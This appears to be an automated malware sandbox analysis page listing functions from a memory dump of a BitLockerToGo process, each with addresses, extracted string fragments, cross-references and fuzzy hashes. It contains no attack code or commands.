Instruction ID: 7e78923c2810f25701d498eee9c091b0ac9adb559134b76200be91fb981cbf51
Opcode Fuzzy Hash: df41d6de78c981e39bdff221ac6eabcd88139be308bf1d7d6fec53855141a323
Instruction Fuzzy Hash: 9F42A5B454D385CAE2B4CF219484BCEBAE1FB92344F608A1DD5ED5B215DBB08189CF93

Function 00401000 Relevance: 11.9, Strings: 8, Instructions: 1857COMMON

Download Yara Rule

Strings

@, xrefs: 00401930
0123456789ABCDEFXP, xrefs: 00401483, 004014FB
0123456789abcdefxp, xrefs: 0040148F, 0040150B
A, xrefs: 00401488
-, xrefs: 004022E4
gfff, xrefs: 00402398
gfff, xrefs: 00402332
gfff, xrefs: 004023E1

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$A$gfff$gfff$gfff
API String ID: 0-2771814109
Opcode ID: 2c382152898fe22e6f66a1565472d404cf9d8cf975932fb0e452107244ace552
Instruction ID: 363a9b25cbbaa82b8fb36bd39ca1af17b002e70744c7fddc499945260a0f6b3b
Opcode Fuzzy Hash: 2c382152898fe22e6f66a1565472d404cf9d8cf975932fb0e452107244ace552
Instruction Fuzzy Hash: D9D2C2716083518FC714CE29C49436ABBE1ABC9314F188A3EE895EB3D1D778D946CB86

Function 0041D8F0 Relevance: 10.5, Strings: 8, Instructions: 463COMMON

Download Yara Rule

Strings

}, xrefs: 0041D992
sq, xrefs: 0041DB97
=:;8, xrefs: 0041DD17, 0041DD26
rq, xrefs: 0041D9B3
ki, xrefs: 0041DBAD
4`[b, xrefs: 0041DD70
gfe, xrefs: 0041DBB8
{, xrefs: 0041D9A8

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: {$}$4`[b$=:;8$rq$gfe$ki$sq
API String ID: 0-1193525237
Opcode ID: 97bbba3253ed3a26e62ae8ec9fed4756aebe1bfa983dea0bfc7ec9cdf2b32335
Instruction ID: 1700ed39e0856391abea424d780f9cbf4af4cd72463eeab68d4fa11a1ab4cf9c
Opcode Fuzzy Hash: 97bbba3253ed3a26e62ae8ec9fed4756aebe1bfa983dea0bfc7ec9cdf2b32335
Instruction Fuzzy Hash: 24F1D2B4508340DBD7309F24D881BEBB7F1EF96355F04092DE4C98B252EB799990CB9A

Function 00401313 Relevance: 9.7, Strings: 7, Instructions: 954COMMON

Download Yara Rule

Strings

0, xrefs: 00402510
d, xrefs: 00401CB9
0, xrefs: 00401E74
0, xrefs: 00401CF1
i, xrefs: 00402992
0, xrefs: 00401E17
u, xrefs: 0040176D

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 0$0$0$0$d$i$u
API String ID: 0-3486945486
Opcode ID: 113eec66203b58e135d67bda9271b89ba8599b546060ec6c1189fb8e75e6fe8c
Instruction ID: 963551e121593fd02373400c95a3cb274629fc5a5769921a760d513362c074e0
Opcode Fuzzy Hash: 113eec66203b58e135d67bda9271b89ba8599b546060ec6c1189fb8e75e6fe8c
Instruction Fuzzy Hash: 8A72E0726083418FC318DE28C59476BBBE1AFC5344F148A2EE8D9A73D1D778D945CB8A

Function 0042D9A7 Relevance: 8.4, Strings: 6, Instructions: 874COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0042E250
-, xrefs: 0042E807
SdTb, xrefs: 0042E0AC
=:;8, xrefs: 0042E203, 0042E20E
|B, xrefs: 0042E176
Zh!|, xrefs: 0042E0BA

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: -$4`[b$=:;8$SdTb$Zh!|$|B
API String ID: 0-1200263840
Opcode ID: 85937bbfd69c1e5c6c313525f42b28d36fbc2e0188032503414aec0a2f1972fc
Instruction ID: d50533d416aa417daf7a185a4eeaa3030d5412ce818746e840f0d69cddcd4f22
Opcode Fuzzy Hash: 85937bbfd69c1e5c6c313525f42b28d36fbc2e0188032503414aec0a2f1972fc
Instruction Fuzzy Hash: 8562F171E00254CFDB14CF69D8807AEBBB2EF4A314F6942A9E415AB392C7349D42CF54

Function 004013C1 Relevance: 7.9, Strings: 6, Instructions: 377COMMON

Download Yara Rule

Strings

0123456789ABCDEFXP, xrefs: 004013C1
gfff, xrefs: 0040204F
0123456789abcdefxp, xrefs: 004013CD
-, xrefs: 00402037
E, xrefs: 004013C6
gfff, xrefs: 0040206E

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$E$gfff$gfff
API String ID: 0-2211778581
Opcode ID: 447a8ecde96fc2574cae4bae1ff5453be40522dae3c7e04d143118fe5123c2bd
Instruction ID: 525695b8e0f072762d4053fac2bf1577f12065d0112c1fab16079a86bd2978bd
Opcode Fuzzy Hash: 447a8ecde96fc2574cae4bae1ff5453be40522dae3c7e04d143118fe5123c2bd
Instruction Fuzzy Hash: F6E1B0716083528FC714CE28C58466BBBE2AFD5304F188A3EE8D9973D2D778D945CB86

Function 0042EB22 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 70fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(OM,?,00000000), ref: 0042EBEA

Strings

OM, xrefs: 0042EBE6, 0042EBE9, 0042EC00, 0042EC1A
GE, xrefs: 0042EB77
OM, xrefs: 0042EB85

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: CopyFile
String ID: GE$OM$OM
API String ID: 1304948518-1796722414
Opcode ID: 028830ee781b77115525a61c1d0fdc156d757e910ea0d6d44f8b083ec3a1449c
Instruction ID: 94017b4cd5acd48df1f022aafba707baa94bf12adfcc3f861590dd57436e7463
Opcode Fuzzy Hash: 028830ee781b77115525a61c1d0fdc156d757e910ea0d6d44f8b083ec3a1449c
Instruction Fuzzy Hash: 1921AFB4901314DBEF20CF20D986B8ABBB4EB0A705F1541D8E9086F243D335DA41CFA8

Function 0042DC47 Relevance: 7.0, Strings: 5, Instructions: 748COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0042E250
SdTb, xrefs: 0042E0AC
=:;8, xrefs: 0042E203, 0042E20E
|B, xrefs: 0042E176
Zh!|, xrefs: 0042E0BA

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 4`[b$=:;8$SdTb$Zh!|$|B
API String ID: 0-1624774871
Opcode ID: df73dd4e00e0146e556e35a79d6bc7d4c7d02742162ad7bd54664be90e178abd
Instruction ID: 004f1e2a4fbb141325d29fd064dbe3c2e00dbef747cbb9a165f0a6185008ccc5
Opcode Fuzzy Hash: df73dd4e00e0146e556e35a79d6bc7d4c7d02742162ad7bd54664be90e178abd
Instruction Fuzzy Hash: D5421570A00255CFDB14CF69D8907AEBBB2FF4A315F6842A9E415AB392C7349D42CF94

Function 004298D1 Relevance: 6.7, Strings: 5, Instructions: 484COMMON

Download Yara Rule

Strings

C7HI, xrefs: 00429B00
<KJM, xrefs: 00429B08
=:;8, xrefs: 00429E83, 00429E8B
U3C5, xrefs: 00429AF8
4`[b, xrefs: 00429EC0

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 4`[b$<KJM$=:;8$C7HI$U3C5
API String ID: 0-1623928751
Opcode ID: 8a47d02dcf5b296caad55e1acc8840957f399fbd64bc1a0b77361811f638cf62
Instruction ID: 680a2791ab23cf1892a719852d2ef80890af6ec4c1e5e8cdc35f465c00cad000
Opcode Fuzzy Hash: 8a47d02dcf5b296caad55e1acc8840957f399fbd64bc1a0b77361811f638cf62
Instruction Fuzzy Hash: 6BF1A971608351CBD724DF24E8806AAB7F1FF95742F94882DE4C597260EB38DE44DB8A

Function 0042D9E1 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0042DC20
=:;8, xrefs: 0042DBD3, 0042DBDE
]@XE, xrefs: 0042DAC4
1=M, xrefs: 0042DAA8
XH5F, xrefs: 0042DAB6

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 1=M$4`[b$=:;8$XH5F$]@XE
API String ID: 0-726025191
Opcode ID: 3b6883538ad15526ec5b690b7a9480c667ffccc06eddfffe244d6aa2680abb25
Instruction ID: e10ddc67b15b17b014a2e7a20ded9f30f2871cced3dc0f5053e972bda9a3c937
Opcode Fuzzy Hash: 3b6883538ad15526ec5b690b7a9480c667ffccc06eddfffe244d6aa2680abb25
Instruction Fuzzy Hash: F1510271D00229DFDB108FA5E880B5EBBB1FF09309F5501A9E508AB352C779E991CF94

Function 0042BE37 Relevance: 5.5, Strings: 4, Instructions: 473COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0042C130
=:;8, xrefs: 0042C0E3
4`[b, xrefs: 0042C390
P3O1, xrefs: 0042BF1C

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 4`[b$4`[b$=:;8$P3O1
API String ID: 0-1806085102
Opcode ID: b04cbee11dc522cdbf0045c4223b4e04b946785d87d39fcf7ad50bd3618b86b4
Instruction ID: b15e2bbf20f923e77032ad17e4b73241467cd35ec3cb2cc4902eb84c9001bb9b
Opcode Fuzzy Hash: b04cbee11dc522cdbf0045c4223b4e04b946785d87d39fcf7ad50bd3618b86b4
Instruction Fuzzy Hash: 32F1ABB4D00229DBDB10CFA4DC81BAEBBB1FB49305F5444A9E509BB352D734A990CFA5

Function 0040DC30 Relevance: 5.3, Strings: 4, Instructions: 340COMMON

Download Yara Rule

Strings

Gzj, xrefs: 0040DE33, 0040DE3B
@DZ1, xrefs: 0040DD83, 0040DD8B
$, xrefs: 0040DDCC
H, xrefs: 0040DC95

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: $$@DZ1$Gzj$H
API String ID: 0-614739676
Opcode ID: fbad81e72831d483a1de6a8cd480c57be8b38d51faf188eb51cb010a9bb41c22
Instruction ID: ac48c09733377721cc1f1bfaed9cc5e864e5474113161bdfd1579b2fe7f34207
Opcode Fuzzy Hash: fbad81e72831d483a1de6a8cd480c57be8b38d51faf188eb51cb010a9bb41c22
Instruction Fuzzy Hash: D7C126B050C3809BE711EF59D480A2FBBE4EB96744F140D2DE1D49B292D37AD918CBA7

Function 00427550 Relevance: 4.2, Strings: 3, Instructions: 432COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00427990
0325, xrefs: 00427784
=:;8, xrefs: 00427953, 0042795B

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 0325$4`[b$=:;8
API String ID: 0-3956534492
Opcode ID: 8dabbfa25ea0a728dffc6c4ea9982322dbb246f011b4ca9af80085fcbc215825
Instruction ID: 3aab324bb72b89f1683c8538196a7533cf9a6bf9f7d0c53fc95193f5b901fa30
Opcode Fuzzy Hash: 8dabbfa25ea0a728dffc6c4ea9982322dbb246f011b4ca9af80085fcbc215825
Instruction Fuzzy Hash: ABC1C1B1A0C2209BD711AF19E881A2BB7F4EF95354F88481EF4C597352E339D950CB6B

Function 00449D20 Relevance: 4.1, Strings: 3, Instructions: 334COMMON

Download Yara Rule

Strings

kji, xrefs: 00449D60
dfb, xrefs: 0044A033, 0044A03B
s q, xrefs: 00449D50

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: dfb$kji$s q
API String ID: 0-3127500456
Opcode ID: 5eb86624eb7ba51c3ccc41d282877ceef17955ad524ac09f5533b51688be64b7
Instruction ID: c8439c12e6535eb020eff4f5c98fa42cafe58b9aeb76c76c212feba92e28e4e0
Opcode Fuzzy Hash: 5eb86624eb7ba51c3ccc41d282877ceef17955ad524ac09f5533b51688be64b7
Instruction Fuzzy Hash: 05B11272A083508BF714DF68CC41B6BB7E5EB85318F18492EE984D7382E779DC04979A

Function 00412F7D Relevance: 4.0, Strings: 3, Instructions: 241COMMON

Download Yara Rule

Strings

FT]N, xrefs: 00412FFB
ivuf, xrefs: 00413002
NP]V, xrefs: 00412FF4

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: FT]N$NP]V$ivuf
API String ID: 0-3464918649
Opcode ID: 0a0c716fc30bb2ba3c43aa761b45ca2f0e3b296e9594aaf1675a9d8a8798c52e
Instruction ID: 7303c6f1c05700f2e1d18021fa4a331d4371df61441cc8f19a7729ae9b1d8fdb
Opcode Fuzzy Hash: 0a0c716fc30bb2ba3c43aa761b45ca2f0e3b296e9594aaf1675a9d8a8798c52e
Instruction Fuzzy Hash: 448147B4100B81AFD721CF29C490A62BFF1BF1A345B24498ED4D58BB06D33AE556CFA5

Function 0044A932 Relevance: 3.3, Strings: 2, Instructions: 810COMMON

Download Yara Rule

Strings

tJv, xrefs: 0044B0E3, 0044B0EB
tJv, xrefs: 0044B0BC

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: tJv$tJv
API String ID: 0-2344526803
Opcode ID: 7ca4722585937f08b766e9ad159c81ecd44e4af43792f7b69357920886833bfb
Instruction ID: ed43a56b5095cd81568e430b178c3eb1c9579b9e18b57947295b8ff215ed7f44
Opcode Fuzzy Hash: 7ca4722585937f08b766e9ad159c81ecd44e4af43792f7b69357920886833bfb
Instruction Fuzzy Hash: 6142CB35A08211CFDB04CF68E89066EB7F2FB89315F1888BDE98597352D739E850CB59

Function 0044A9E0 Relevance: 3.3, Strings: 2, Instructions: 775COMMON

Download Yara Rule

Strings

tJv, xrefs: 0044B0E3, 0044B0EB
tJv, xrefs: 0044B0BC

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: tJv$tJv
API String ID: 0-2344526803
Opcode ID: dcd34ba103d5ac1f1775573b82778bd1f161676eb4141865a9952ef9b5eef5ba
Instruction ID: 93c29d58451001bd0b3f4ff424517779922722812c756e174afbcc3cfd3d403d
Opcode Fuzzy Hash: dcd34ba103d5ac1f1775573b82778bd1f161676eb4141865a9952ef9b5eef5ba
Instruction Fuzzy Hash: 2B42AB35A08211CFDB04CF68E89066EB7F2FB89315F1888BDE98597352D739E850CB59

Function 0044AB90 Relevance: 3.2, Strings: 2, Instructions: 664COMMON

Download Yara Rule

Strings

tJv, xrefs: 0044B0E3, 0044B0EB
tJv, xrefs: 0044B0BC

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: tJv$tJv
API String ID: 0-2344526803
Opcode ID: dc24541b205ee10f6a3c19b32f3e6ad926da073f79494dbc2c8572b453d321e5
Instruction ID: 25fe64039c5d3a24483c362e00e12951589b1c98f1c81f28c44ea4f498adebc5
Opcode Fuzzy Hash: dc24541b205ee10f6a3c19b32f3e6ad926da073f79494dbc2c8572b453d321e5
Instruction Fuzzy Hash: 5832CA35A08211CFDB04CF68E89066EB7F2FB89315F1988BDE88597352D739E850CB95

Function 0044AD70 Relevance: 3.1, Strings: 2, Instructions: 643COMMON

Download Yara Rule

Strings

tJv, xrefs: 0044B0E3, 0044B0EB
tJv, xrefs: 0044B0BC

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: tJv$tJv
API String ID: 0-2344526803
Opcode ID: f9c921d4ae009efe52e83fc8f24befe3c383ca562722e9c15a22a034c06afd08
Instruction ID: 231cfa66134ed0dab357ad1cc03baf3191c60cccdc5d3bd4812cb99c2ff863f7
Opcode Fuzzy Hash: f9c921d4ae009efe52e83fc8f24befe3c383ca562722e9c15a22a034c06afd08
Instruction Fuzzy Hash: 5D22DB75A08214CFDB08CF68E89066EB7F2FB8A315F18887DE89597352D739D900CB59

Function 0044AC90 Relevance: 3.1, Strings: 2, Instructions: 631COMMON

Download Yara Rule

Strings

tJv, xrefs: 0044B0E3, 0044B0EB
tJv, xrefs: 0044B0BC

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: tJv$tJv
API String ID: 0-2344526803
Opcode ID: 969917ad1db35dc7731d34be8fcb9b8b0d93f2378d4963e664e0bd336c9d9710
Instruction ID: ed4538103e64230586d2f1946e59c3361a487002a922ffc509a230fc746aac96
Opcode Fuzzy Hash: 969917ad1db35dc7731d34be8fcb9b8b0d93f2378d4963e664e0bd336c9d9710
Instruction Fuzzy Hash: A622BA75A08215CFDB04CF68E89066EB7F2FB8A315F18887DE88597352D739E810CB95

Function 00445A00 Relevance: 3.1, Strings: 2, Instructions: 582COMMON

Download Yara Rule

Strings

f, xrefs: 00445BC8
=:;8, xrefs: 00445A74, 00445A7D

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: =:;8$f
API String ID: 0-3135044532
Opcode ID: b5ae2fdf1ba6e6d45b043573ce33b4d53030d04a36a28d23ce19ad594f766d78
Instruction ID: 7f596cb155c38b435249be9e705f971bb2d73ce525ed6bd1c517e3ee427ebd30
Opcode Fuzzy Hash: b5ae2fdf1ba6e6d45b043573ce33b4d53030d04a36a28d23ce19ad594f766d78
Instruction Fuzzy Hash: 4E228D716087409FEB14CF18C890A2BBBE1EF89314F588A2EF49597392D739D905CB96

Function 00421E00 Relevance: 3.0, Strings: 2, Instructions: 541COMMON

Download Yara Rule

Strings

AFsu, xrefs: 004222DD
0 6+, xrefs: 00422174, 0042217D

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 0 6+$AFsu
API String ID: 0-3491052511
Opcode ID: 253c4b449bcb42178324a570e9743720e00c79cea21463402cc45e28e42058e9
Instruction ID: e4a51f6638df7e70f071bf0a1ee2fa99d92fa4f644f98849879c5dc1d6712452
Opcode Fuzzy Hash: 253c4b449bcb42178324a570e9743720e00c79cea21463402cc45e28e42058e9
Instruction Fuzzy Hash: C302AC71608350ABD300DB21E945A6FFBE5EFC5708F44882EF98897242D379ED059B9B

Function 00403720 Relevance: 2.9, Strings: 2, Instructions: 431COMMON

Download Yara Rule

Strings

NaN, xrefs: 0040377E
Inf, xrefs: 00403777

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: Inf$NaN
API String ID: 0-3500518849
Opcode ID: 3a2627d5db625a150ecca91407b01afbba361670d534a4b540843f849dad21ec
Instruction ID: 0191a236d2af6ae24c7173bea0bbe2ea565b013d05bd4f7f8e499a0c5c877110
Opcode Fuzzy Hash: 3a2627d5db625a150ecca91407b01afbba361670d534a4b540843f849dad21ec
Instruction Fuzzy Hash: AAE1D772A083119BC704CF29C88065BBBE5EBC4750F158A3EF899A73D1E775DD058B86

Function 004303A8 Relevance: 2.9, Strings: 2, Instructions: 430COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00430830
=:;8, xrefs: 004307F3, 004307FB

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 4`[b$=:;8
API String ID: 0-714975375
Opcode ID: b8bc8d91a6e994246ed860d1f026f7c79f0a5f8a851e15c85b70ca3d417da22d
Instruction ID: 649ad463f4e0cb9addd154c270ece67ef40bc6d82da64b16b09d45ee8a5ffcc1
Opcode Fuzzy Hash: b8bc8d91a6e994246ed860d1f026f7c79f0a5f8a851e15c85b70ca3d417da22d
Instruction Fuzzy Hash: 28D1F1725083818FD311DF28C86061ABBE2AF9A315F184B5DF4E49B3A2C739C945CF5A

Function 00415620 Relevance: 2.9, Strings: 2, Instructions: 426COMMON

Download Yara Rule

Strings

5[A, xrefs: 00415B2B
=:;8, xrefs: 004159A9

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 5[A$=:;8
API String ID: 0-1184200876
Opcode ID: 55bd480859af5e061bb8f4c8d958fe8521bd148e70b6dbb7fffb3ffffde1d092
Instruction ID: d45d34821b613764dea48606dd3b1b9b559a378ad3e827903911162677739ce0
Opcode Fuzzy Hash: 55bd480859af5e061bb8f4c8d958fe8521bd148e70b6dbb7fffb3ffffde1d092
Instruction Fuzzy Hash: C9F19EB5600B01CFC724CF25D990A66B7F2FF89311B188A2EE49687B91E774F854CB58

Function 00408270 Relevance: 2.9, Strings: 2, Instructions: 385COMMON

Download Yara Rule

Strings

IEND, xrefs: 004086CD
), xrefs: 004082ED

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 6dd5bb7813e2b4f116d565c9fb29b2fc5a1dd86faa26161cce8cb7b6681cfb4b
Instruction ID: 4fab473f1f70dd0b904ec002cf45eccbe6bac7343974eed6985bdc861b9fc24a
Opcode Fuzzy Hash: 6dd5bb7813e2b4f116d565c9fb29b2fc5a1dd86faa26161cce8cb7b6681cfb4b
Instruction Fuzzy Hash: 6CE1CF71A087019FD310DF29C88571ABBE0BB94314F148A3EE999A73C1D779E915CBCA

Function 0041D4B0 Relevance: 2.9, Strings: 2, Instructions: 381COMMON

Download Yara Rule

Strings

=:;8, xrefs: 0041D7F3, 0041D7FB
4`[b, xrefs: 0041D830

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 4`[b$=:;8
API String ID: 0-714975375
Opcode ID: ffaa25d41177938bf36974ac660e3c1efaa8d0eb970e58262480ad07b6440291
Instruction ID: 3fa78135b6e23d501e1a720a9dd3bca7cd69dc445951f38944ea97a7413bbe58
Opcode Fuzzy Hash: ffaa25d41177938bf36974ac660e3c1efaa8d0eb970e58262480ad07b6440291
Instruction Fuzzy Hash: 93A102B2914211DBCB10AF28DC927AB73E1EF99315F08452EF885C73A1E778D944C75A

Function 00448B32 Relevance: 2.8, Strings: 2, Instructions: 335COMMON

Download Yara Rule

Strings

%&' , xrefs: 00448753, 0044875B
4`[b, xrefs: 00448C80

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: %&' $4`[b
API String ID: 0-3857453902
Opcode ID: 180b439c29b2281482ffdfa30f1dd6a3daf6204c1f93d48d95da8a2e48861a91
Instruction ID: 94f74317c539a3eab9f37f6020083581aea4f198888a85ca84da18fb8fc8bb91
Opcode Fuzzy Hash: 180b439c29b2281482ffdfa30f1dd6a3daf6204c1f93d48d95da8a2e48861a91
Instruction Fuzzy Hash: C8A15A7450C3409BE305EF18D990A2FB7F5EB9A306F64882EE0C597222DB39D814DB5A

Function 004210BC Relevance: 2.8, Strings: 2, Instructions: 304COMMON

Download Yara Rule

Strings

u+l), xrefs: 00421303, 0042130B
X_, xrefs: 004212E1

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: X_$u+l)
API String ID: 0-2815168032
Opcode ID: 652742d4c793cca40e6aab64ae1bac8dbb3e79afc34ddfdae4453922501b8543
Instruction ID: 49919322e427e4d5c49c3bbe16649e2197b8adc96e0e0562d8ff6ba47dd19570
Opcode Fuzzy Hash: 652742d4c793cca40e6aab64ae1bac8dbb3e79afc34ddfdae4453922501b8543
Instruction Fuzzy Hash: E8817AB46083108BC710DF14D881A2BB7F0EFA5755F848A5EE8C59B3A1E339D905CB9A

Function 004210D4 Relevance: 2.8, Strings: 2, Instructions: 299COMMON

Download Yara Rule

Strings

u+l), xrefs: 00421303, 0042130B
X_, xrefs: 004212E1

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: X_$u+l)
API String ID: 0-2815168032
Opcode ID: d886251012a59c139092ffebec3ac849b5aafb5cedbd3af4a8fee53a42abf5f8
Instruction ID: e2695a0634a689886ee64c8fd0564a3cb9f4c08cb83000b7c4b701b7ae3c28aa
Opcode Fuzzy Hash: d886251012a59c139092ffebec3ac849b5aafb5cedbd3af4a8fee53a42abf5f8
Instruction Fuzzy Hash: A5817974608310CBC710DF14D881A2BB7F0EFA5755F848A5EE8C59B3A1E339D905CB9A

Function 00421833 Relevance: 2.7, Strings: 2, Instructions: 233COMMON

Download Yara Rule

Strings

X_, xrefs: 00421903, 0042190B
w|, xrefs: 00421883

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: X_$w|
API String ID: 0-3199794474
